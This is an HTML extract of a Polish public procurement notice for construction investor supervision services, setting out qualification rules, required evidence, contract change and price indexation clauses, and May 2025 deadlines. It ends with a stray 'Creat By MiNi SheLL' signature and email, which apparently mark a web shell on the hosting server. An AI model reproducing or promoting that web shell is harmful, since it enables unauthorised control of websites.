zamawiający rozumie uprawienia „bez ograniczeń” w rozumieniu przepisów ustawy Prawo budowlane i przepisów wykonawczych w wersji obowiązującej w dniu wydania uprawnień – w przypadku uprawnień nadanych po wejściu w życie przepisów wprowadzających zakres uprawnień „bez ograniczeń”. Przez uprawnienia bez ograniczeń zamawiający uznaje także uprawienia które nie zawierają ograniczeń uniemożliwiających nadzorowanie robót będących przedmiotem zamówienia - w przypadku uprawnień nadanych przed wejściem w życie przepisów wprowadzających zakres uprawnień „bez ograniczeń”.<br/>5)	Zamawiający dopuszcza łączenie funkcji Inspektora nadzoru inwestorskiego dla poszczególnych branż, zgodnie z posiadanymi uprawnieniami budowlanymi.<br/>6)	Przez posiadanie uprawnień budowlanych wymaganych prawem dla osób uczestniczących w realizacji zamówienia, rozumie się uprawnienia do wykonywania samodzielnych funkcji w budownictwie w rozumieniu art. 15a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2024 r. poz. 725 z późn. zm.) oraz przepisów wcześniejszych. Samodzielne funkcje techniczne w budownictwie (nazwy specjalności i ich zakresy) będą rozpatrywane zgodnie z przepisami regulującymi nadawanie uprawnień budowlanych w dacie ich nadania. <br/>7)	Wykonawca w celu wykazania spełniania warunków określonych w pkt 6.1.4, ppkt 2) SWZ może wskazać osobę będącą obywatelem państwa członkowskiego w rozumieniu art. 4a ust. 1 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t. j. Dz. U. z 2023 r. poz. 551 z późn.zm.), która nabyła kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznaczne wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej – zgodnie z właściwymi przepisami, w szczególności z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t. j. Dz. U. z 2020 r., poz. 220 z późn.zm.) oraz ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2023 r. poz. 551 z późn.zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">8.3.2.	W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu:<br/>Zamawiający nie wymaga złożenia przez Wykonawcę podmiotowych środków dowodowych w tym zakresie.7.6.	Wykonawca podlega wykluczeniu także w oparciu o podstawy wykluczenia wskazane art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.3.	Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni od dnia wezwania) następujących podmiotowych środków dowodowych (aktualnych na dzień złożenia):<br/><br/>8.3.1.	W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a)	wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie, wraz z podaniem wartości nadzorowanych robót, powierzchni użytkowej realizowanego obiektu, dat wykonania usługi i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów –oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy przed upływem terminu składania ofert (Załącznik Nr 7 do SWZ) – w odniesieniu do warunku określonego w pkt. 6.1.4. ppkt. 1) SWZ,<br/>b)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami sporządzonego zgodnie z Załącznikiem Nr 8 do SWZ – w odniesieniu do warunku określonego w pkt. 6.1.4. ppkt. 2) SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przez Wykonawcę przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 8.1.	Wykonawca zobowiązany jest złożyć wraz z ofertą oświadczenia stanowiące wstępne potwierdzenie, że Wykonawca na dzień składania ofert:<br/>a)	nie podlega wykluczeniu,<br/>b)	spełnia warunki udziału w postępowaniu.<br/>8.1.1.	Oświadczenia należy złożyć wg wymogów załącznika nr 4 i 5 do SWZ.<br/>8.1.2.	Jeżeli Wykonawca nie złożył oświadczeń, o którym mowa w pkt 8.1 SWZ lub są one niekompletne lub zawierają błędy, Zamawiający wezwie Wykonawcę odpowiednio do ich złożenia, poprawienia lub uzupełnienia w wyznaczonym terminie, chyba że oferta Wykonawcy podlega odrzuceniu bez względu na ich złożenie, uzupełnienie lub poprawienie lub zachodzą przesłanki unieważnienia postępowania.<br/>8.1.3.	Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści złożonych oświadczeń, o których mowa w pkt 8.1 SWZ.<br/>8.1.4.	Jeżeli złożone przez Wykonawcę oświadczenia, o którym mowa w pkt 8.1 SWZ budzą wątpliwości Zamawiającego, może on zwrócić się bezpośrednio do podmiotu, który jest w posiadaniu informacji lub dokumentów istotnych w tym zakresie dla oceny spełniania przez Wykonawcę warunków udziału w postępowaniu lub braku podstaw wykluczenia, o przedstawienie takich informacji lub dokumentów.8.2.	W przypadku, o którym mowa w rozdziale 6.3 SWZ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika nr 6 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>10.2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a)	oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy <br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b)	w przypadku, o którym mowa w rozdziale 6.3 SWZ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika nr 6 do SWZ. <br/>c)	zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki dowodowe, o których mowa w pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku.<br/>10.3.	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 21.1	Projekt Umowy stanowi Załącznik Nr 2 do SWZ. 21.2	Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na podstawie art. 454-455 ustawy Pzp oraz postanowień Projektu Umowy.1.	Oprócz przypadków, o których mowa w art. 454 i 455 ustawy – Prawo zamówień publicznych i innych przypadków wskazanych w niniejszej umowie, Zamawiający dopuszcza możliwość wprowadzania zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku:1)zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy (zmiana umowy dotyczyć będzie zakresu umowy wymagającego zmiany w celu dostosowania do nowych przepisów i ich skutków);<br/>2)	zmiany umów zawartych pomiędzy Zamawiającym, a innym niż Wykonawca podmiotem, w tym w szczególności zmiany zasad i wymagań wynikających z założeń projektu FENX.07.01 infrastruktura kultury i turystyki kulturowej priorytet FENX.07 Kultura Programu Fundusze Europejskie na Infrastrukturę, Klimat, Środowisko 2021-2027, w zakresie mającym bezpośredni wpływ na realizację przedmiotu umowy (zmiana umowy dotyczyć będzie zakresu umowy wymagającego zmiany w celu dostosowania do nowych postanowień ww. dokumentów i ich skutków);<br/>3)	wystąpienia okoliczności niezależnych od Wykonawcy, a wynikających ze zmian umowy z Wykonawcą robót budowlanych w szczególności dotyczących harmonogramu rozliczeń i wykonywania poszczególnych czynności, z zastrzeżeniem pkt 4) (zmiana umowy dotyczyć będzie zakresu umowy wymagającego zmiany w celu dostosowania do nowych postanowień umowy o roboty budowlane i ich skutków);<br/>4)	zmiany wynagrodzenia Wykonawcy w przypadku zwiększenia lub zmniejszenia zakresu robót Wykonawcy o więcej niż 10% ich wartości wynikającej ze złożonej oferty na następujących zasadach:<br/>a)	wynagrodzenie Wykonawcy usługi nadzoru inwestorskiego zostanie zmniejszone lub zwiększone procentowo wg wzoru: <br/>Wnz = Wnb +/- (Wz x Wnb)<br/>Gdzie:<br/>Wnz = wynagrodzenie po zmianie<br/>Wnb = wynagrodzenie wskazane w § 3 ust. 1 umowy<br/>Wz = wskaźnik procentowy o jaki przekroczono wartość 10% zmiany ceny wynagrodzenia Wykonawcy robót<br/>b)	zwiększenie lub zmniejszenie wynagrodzenia Wykonawcy wymaga aneksu do umowy w postaci nowego paragrafu obejmującego wysokość dodatkowego wynagrodzenia Wykonawcy i zasady jego wypłaty.<br/>c)	Wykonawca, którego wynagrodzenie zostało zmienione zgodnie z pkt. 4) ppkt a) – b) zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, w zakresie odpowiadającym zwiększeniu lub zmniejszeniu zakresu robót Wykonawcy, dotyczących zobowiązania podwykonawcy, jeżeli łącznie spełnione są następujące warunki:<br/>1) przedmiotem umowy są roboty budowlane, dostawy lub usługi;<br/>2) okres obowiązywania umowy przekracza 6 miesięcy. <br/>5)	wystąpienia okoliczności wynikających z działania siły wyższej (przez którą należy rozumieć zdarzenia niezależne od żadnej ze Stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiły po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej) - zmiana dotyczyć może terminu wykonania zamówienia i zakresu świadczenia Wykonawcy, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi występowania okoliczności siły wyższej.<br/>6)	zmiany/wprowadzenia Podwykonawcy pod warunkiem odpowiedniego zgłoszenia i po akceptacji Zamawiającego.<br/>Ze względu na ograniczoną liczbę znaków pozostałe zmiany i informacje dotyczące zmian zawarte są w załączniku nr 2 do SWZ - projekcie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">14.1. Wykonawca składa ofertę za pomocą Platformy e-Zamówienia dostępnej pod adresem wskazanym w pkt. 1.2. SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-29 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 2.	Przyjmuje się, że szacowany czas realizacji usługi (dla którego ustala się wysokość wynagrodzenia wykonawcy ujętego w ofercie) wynosi 24 miesiące. <br/>3.	Ryzyko wydłużenia pracy Wykonawcy wynikające z wydłużenia terminów realizacji robót budowlanych strony ponoszą w następujący sposób:<br/>1) wydłużenie terminu realizacji robót do 27 miesięcy w stosunku do terminu wskazanego w ust. 2 nie ma wpływu na wysokość wynagrodzenia wykonawcy nie uprawnia go też do dochodzenia z tego tytułu roszczeń za wykonywanie prac dodatkowych lub dłuższego pozostawiania w gotowości do realizacji świadczenia;<br/>2)	wydłużenie terminu realizacji robót powyżej 27 miesięcy w stosunku do terminu wskazanego w ust. 2 uprawnia wykonawcę do otrzymania wynagrodzenia za trzeci i kolejne miesiące realizacji po upływie terminu wskazanego w ust. 2 w wysokości ustalonej zgodnie z ust. 5 <br/>Klauzula waloryzacyjna<br/>1.	Strony przewidują możliwość zmiany wynagrodzenia Wykonawcy zgodnie z poniższymi zasadami, w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia:<br/>1)	wyliczenie wysokości zmiany wynagrodzenia odbywać się będzie przed zapłatą każdej z faktur w oparciu o wskaźnik cen towarów i usług konsumpcyjnych liczony do poprzedniego miesiąca publikowany przez Prezesa GUS = zwany dalej wskaźnikiem GUS<br/>2)	w sytuacji, gdy średnia wskaźników GUS opublikowanych w okresie od dnia zawarcia umowy do dnia odbioru będącego podstawą zapłaty danej faktury VAT przekroczy 5%, strony mogą po dokonaniu odbioru a przed wystawieniem faktury VAT złożyć wniosek o dokonanie odpowiedniej zmiany wynagrodzenia;<br/>3)	strona po spełnieniu przesłanek wskazanych w pkt 1-2 może złożyć wniosek o zmianę wynagrodzenia w wysokości wynikającej z wyliczenia:<br/><br/>A x (B% - 5 %) = C,<br/><br/>gdzie:<br/>A – wartość wynagrodzenia wykonawcy <br/>B –	średnia opublikowanych wskaźników GUS w okresie od dnia zawarcia umowy do dnia podpisania protokołu odbioru.<br/>C - wartość zmiany.<br/>4)	strona składając wniosek o zmianę powinna przedstawić wyliczenie wnioskowanej kwoty zmiany wynagrodzenia;<br/>5)	łączna wartość zmian wysokości wynagrodzenia Wykonawcy, dokonanych na podstawie postanowień niniejszego paragrafu nie może być wyższa niż 10 % <br/>w stosunku do pierwotnej wartości umowy. <br/>6)	zmiana wynagrodzenia w oparciu o niniejszy ustęp wymaga zgodnej woli obu stron wyrażonej aneksem do umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com